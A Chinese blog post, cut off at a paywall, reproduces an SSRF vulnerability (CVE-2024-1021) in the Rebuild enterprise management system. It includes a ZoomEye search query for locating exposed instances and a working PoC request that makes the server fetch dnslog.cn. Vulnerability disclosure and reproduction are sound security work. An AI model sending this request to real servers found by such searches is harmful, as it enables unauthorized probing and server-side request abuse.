Rebuild企业管理系统 SSRF漏洞复现(CVE-2024-1021)

最新推荐文章于 2024-05-01 16:53:03 发布
最新推荐文章于 2024-05-01 16:53:03 发布
阅读量538 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136073672
版权

0x01 产品简介

Rebuild是高度可配置化的企业管理系统!企业内部可免费使用!低代码/零代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理,外贸管理,甚至是 ERP 企业资源计划!

0x02 漏洞概述

Rebuild 3.5.5 版本存在安全漏洞,该漏洞源于组件 HTTP Request Handler 的 readRawText 函数的 url 参数存在服务器端请求伪造漏洞。

0x03 影响范围

Ruifang-Tech Rebuild <= 3.5.5

0x04 复现环境

钟馗之眼:app:"rebuild"

af681af11aca41efb0baa240c951f969.png

0x05 漏洞复现

PoC

GET /filex/read-raw?url=http://dnslog.cn&cut=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)
0xSec
04-29 923
蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0xSec
05-01 858
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
RB企业管理系统 / rebuild-CRM-ERP-库存生产管理系统
05-20
项目特色 REBUILD 通过创新的业务流程引擎帮助你快速搭建各类企业管理系统,全图形化配置无需了解技术。 REBUILD 侧重于业务需求实现,而非基础技术框架或项目启动模板,通过 REBUILD 可以真正实现零代码快速搭建!无需编程、无需编译代码,甚至无需了解任何技术。 V3.3 新特性 本次更新为你带来众多功能增强与优化。 [新增] 标签字段 [新增] 顶部一级菜单 [新增] 普通用户支持数据导入 [新增] 文件支持目录权限配置 [新增] 触发器字段聚合新增“连接”聚合方式(支持多引用字段) [新增] 触发器字段更新支持“源字段为空时置空目标字段”选项 [优化] 明细编辑支持一次选择多个记录并带入 [优化] 30+ 细节/BUG/安全性更新
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 543
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
漏洞复现CVE-2024-4257 蓝网科技临床浏览系统SQL注入
失心少年
05-01 616
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!这会影响文件/xds/deleteStudy.php的未知部分。蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
CVE复现计划】CVE-2024-0195
m0_63138919的博客
04-05 1031
本文以春秋云镜为靶场,进行该CVE-2024-0195的漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
入侵防御漏洞复现(二)_cve-2024-16278 kali(3),2024年最新2024年京东网络安全岗面试必问
2301_77110907的博客
04-16 974
CloudBees Jenkins是美国CloudBees公司的一款基于Java开发的开源的、可持续集成的自动化服务器,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS(Long-Term Support)是CloudBees Jenkins的一个长期支持版本。CloudBees Jenkins 2.56及之前的版本和2.46.1 LTS及之前的版本中存在远程代码执行漏洞
漏洞实现 --- Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
weixin_62443409的博客
09-13 4837
安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)CentOS7(Nodejs和vm@3.9.17)升级nodejs至高版本。
rebuild-WMS-TMS-MES-库存运输生产系统,高度可配置化的企业管理系统
最新发布
05-06
高度可配置化的企业管理系统企业内部可免费使用!零代码/低代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理、MES/MOM,甚至是 ERP 企业资源计划!
rebuild-CRM-ERP-库存运输生产系统,高度可配置化的企业管理系统
01-14
高度可配置化的企业管理系统企业内部可免费使用!低代码/零代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理,外贸管理,甚至是 ERP 企业资源计划!
REBUILD 通过创新的业务流程引擎帮助你快速搭建各类企业管理系统
10-12
REBUILD 通过创新的业务流程引擎帮助你快速搭建各类企业管理系统REBUILD 侧重于业务需求实现,而非基础技术框架或项目启动模板,通过 REBUILD 可以真正实现零代码快速搭建!无需编程、无需编译代码,甚至无需了解...
CVE-2022-24124复现
giaogiaogioao的博客
11-26 750
CVE-2022-24124复现
PHP命令执行漏洞CVE-2024-1874复现
A1andNS's Blog
04-17 477
CVE-2024-1874漏洞复现
CrushFTP 服务器端模板注入漏洞复现(CVE-2024-4040)
0xSec
04-26 679
由于CrushFTP 存在服务器端模板注入漏洞,未经身份验证的远程攻击者可以逃避虚拟文件系统(VFS)沙箱,绕过身份验证获得管理访问权限,泄露敏感信息或执行代码。目前该漏洞技术细节与PoC已在互联网上公开,鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
漏洞复现】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767
失心少年
04-23 642
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该平台ColdFusion 2023
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
Button12138的博客
01-31 956
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
一文搭建复现并分析CVE-2024-25600 WordPress Bricks Builder RCE最新漏洞
tlp_zzm的博客
04-01 1413
一文搭建复现并分析CVE-2024-25600 WordPress Bricks Builder RCE最新漏洞
Progress Kemp LoadMaster 远程命令执行漏洞复现(CVE-2024-1212)
0xSec
05-01 427
Progress Kemp LoadMaster 存在远程命令执行漏洞,未经身份验证的远程攻击者可可利用此类洞写入后门文件执行任意命令,导致服务器被控。
CVE-2024-23897复现及IDS中snort防御规则制定
2401_82670286的博客
01-30 2365
CVE-2024-23897是一个涉及Jenkins未授权文件读取的漏洞。它利用了Jenkins命令行接口(CLI)的特性,其中CLI使用args4j库解析命令行参数。args4j库具有一个特点,即当命令行参数以@字符开头时,该参数会被视为文件路径,并将该文件内容读取作为参数。利用这一特性,攻击者可以通过Jenkins CLI读取Jenkins服务器上的任意文件。这段代码的主要问题在于它处理以字符开头的命令行参数时,会尝试将其视为文件路径,并读取该文件的内容。具体来说,如果参数以。
electron-rebuild
01-31
electron-rebuild是一个用于重新编译Electron项目的工具。当你安装新的npm包时,有时候这些包可能需要重新编译以与Electron兼容。electron-rebuild可以自动检测并重新编译这些包,以确保它们能够在Electron中正常工作。 以下是使用electron-rebuild的步骤: 1. 首先,安装electron-rebuild作为开发依赖项: ```shell npm install electron-rebuild --save-dev ``` 2. 然后,在你的项目根目录下运行以下命令来重新编译所有需要重新编译的包: ```shell $(npm bin)/electron-rebuild ``` 这将自动检测并重新编译所有需要重新编译的包,以确保它们能够在Electron中正常工作。 如果在运行electron-rebuild时遇到问题,可以尝试设置DEBUG环境变量为"electron-rebuild",以获取更详细的错误信息: ```shell DEBUG=electron-rebuild $(npm bin)/electron-rebuild ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值